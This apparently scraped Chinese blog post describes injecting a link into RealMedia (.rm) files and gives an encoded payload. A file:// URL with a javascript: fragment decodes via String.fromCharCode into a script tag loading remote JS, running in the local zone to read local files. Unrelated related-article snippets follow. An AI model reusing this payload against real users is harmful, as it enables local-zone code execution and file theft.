rm格式插入广告代码
很久以前就有这个东西,当时都是用来挂马的,不过忽然想起来,如果能跳到javascript:这样的格式在本地执行js代码意义还是有点的吧,于是测试了下.结果很让人沮丧,realplay对这个好象倒是有限制,而且查看被插入的rm文件里看出应该是本身就做了限制,看来支持的协议不多啊....于是试试file:///,结果发现是支持的,于是想到前段时间的html injection,如果加起来应该有点效果.
u 00:00:02 00:00:05 file://C:\WINDOWS\Help\iisHelp\common\400.htm#javascript:document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,116,101,115,116,46,106,115,62,60,47,115,99,114,105,112,116,62))/
这段代码插进去会出现一个诡异的连接,点击下会执行我指定的js(微软的工程师还是很小心的,暂时正常情况下找到的html就这一个,而且还要点......),而且事实证明的确是本地域执行的,可以读本地的文件,呵呵......而且在realone播放的情况下,ie那个本地执行js代码的警告居然会神奇地消失,于是放到html页面播放,果然很郁闷,打开任何html都会警告,不过还是神奇地能打开本地域的文件.....正常下用window.open是不可以的.....域的限制是可以突破,希望能找到个本地存在问题的html就OK啦,呵呵.......
真希望这些边缘的地方能出点问题,我感觉还是可能的 :)
相关推荐
-
rm格式插入广告代码
很久以前就有这个东西,当时都是用来挂马的,不过忽然想起来,如果能跳到javascript:这样的格式在本地执行js代码意义还是有点的吧,于是测试了下.结果很让人沮丧,realplay对这个好象倒是有限制,而且查看被插入的rm文件里看出应该是本身就做了限制,看来支持的协议不多啊....于是试试file:///,结果发现是支持的,于是想到前段时间的html injection,如果加起来应该有点效果. 复制代码 代码如下: u 00:00:02 00:00:05 file://C:\WINDOWS\
-
Android 应用中插入广告的实例
想必大家都知道,国内的Android应用基本都是免费的,那么开发者如何获得收入呢?应用中插入广告是一个比较常用的盈利手段.本文就讲解如何在Android应用中插入广告. 国内的广告平台有很多,用户数量比较多的有万普,有米,多普.下面就不一一介绍了,免得说我打广告.本文以万普为例. 1.首先去万普官网下载sdk,把sdk里面的jar包导入到项目的lib目录下. 2.修改AndroidManifest.xml文件. 确保应用具有以下几项权限: XML/HTML代码 <uses-pe
-
Android 应用中插入广告详解及简单实例
想必大家都知道,国内的Android应用基本都是免费的,那么开发者如何获得收入呢?应用中插入广告是一个比较常用的盈利手段.本文就讲解如何在Android应用中插入广告. 国内的广告平台有很多,用户数量比较多的有万普,有米,多普.下面就不一一介绍了,免得说我打广告.本文以万普为例. 1.首先去万普官网下载sdk,把sdk里面的jar包导入到项目的lib目录下. 2.修改AndroidManifest.xml文件. 确保应用具有以下几项权限: XML/HTML代码 <uses-perm
-
Java判断上传图片格式的实例代码
先给大家介绍下java判断上传图片格式. 由于客户上传图片将png的图片的后缀名改为jpg,所以通过后缀名判断不行,用下面这个方法可以 //判断是否是JPG格式 log.info("-1----进入JPG格式判断....."); ImageInputStream iis = ImageIO.createImageInputStream(file.getInputStream()); Iterator<ImageReader> iter = ImageIO.getImageR
-
广告代码静态化js通用函数
/* JavaScript Document 广告代码静态化js通用函数 原则上每个页面不应该出现域名的固定指向 */ /* Config */ var sSiteUrl = "http://www.spvjoy.com"; //var sSiteUrl = "http://192.168.1.30:82"; var sSendSite = "http://send.mmstoon.com"; var sMp3Url = "http:/
-
jQuery判断邮箱格式对错实例代码讲解
废话不多说了,具体代码如下所示: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>检测Email地址格式是否正确</title> <script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"><
-
js右下角与漂浮广告代码(兼容多浏览器)
ie6 7 8 ff3.5 3.6 chrome 4.1.2 safari 主要代码如下: 我们右下角广告代码 html,body{ padding:0; margin:0; } 我在随平滚 我静止不动 function scrollx(p){ var d = document,dd = d.documentElement,db = d.body,w = window,o = d.getElementById(p.id),ie6 = /msie 6/i.test(navigator.userAg
-
一段时间以后切换显示的广告代码 原创
先显示广告a,一段时间以后显示广告代码b,然后就一直显示广告b 一段时间以后切换的广告显示代码 a部分内容 b部分内容 var s=5000; //5000毫秒就是5秒 function showb(){ document.getElementById('a').style.display='none'; document.getElementById('b').style.display='block'; } window.setInterval("showb()",s) [Ctrl
-
js 左右悬浮对联广告代码示例
一段js 左右悬浮广告代码,只要修改广告图片地址与连接地址,相应参数根据页面调整下就可以使用这段左右悬浮广告代码了 代码: var delta=0.15 var collection; function floaters() { this.items = ; this.addItem = function(id,x,y,content) { document.write('<DIV id='+id+' style="Z-INDEX: 10; POSITION: absolute; widt
-
js+flash实现的5图变换效果广告代码(附演示与demo源码下载)
本文实例讲述了js+flash实现的5图变换效果广告代码.分享给大家供大家参考,具体如下: 这是一款类似淘宝图片广告的js+flash广告代码.非常美观实用! 运行效果截图如下: 点击此处查看在线演示效果. 具体代码如下: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
随机推荐
- Android实现QQ图片说说照片选择效果
- java.sql.SQLException: 内部错误: Unable to construct a Datum from the specified input
- 浅谈WKWebView 在64位设备上的白屏问题
- 详解数组Array.sort()排序的方法
- React教程之Props验证的具体用法(Props Validation)
- python中self原理实例分析
- 详解Docker下搭建Jenkins构建环境
- DEDE实现转跳属性文档在模板上调用出转跳地址
- “灯泡男”“神奇小子”(Win32.WizardBoy.a)病毒完整解决方案
- js获取指定时间的前几秒
- 用javascript父窗口控制只弹出一个子窗口
- android编程之menu按键功能实现方法
- Java实现支付宝之第三方支付宝即时到账支付功能
- Android local.properties 文件读取实例详解
- 关于.NET异常处理的思考总结
- Javascript将图片的绝对路径转换为base64编码的方法
- Java实现简易版联网坦克对战小游戏(附源码)
- C++设计模式之装饰模式(Decorator)
- Android获取位置信息的方法
- Spring Boot外部化配置实战解析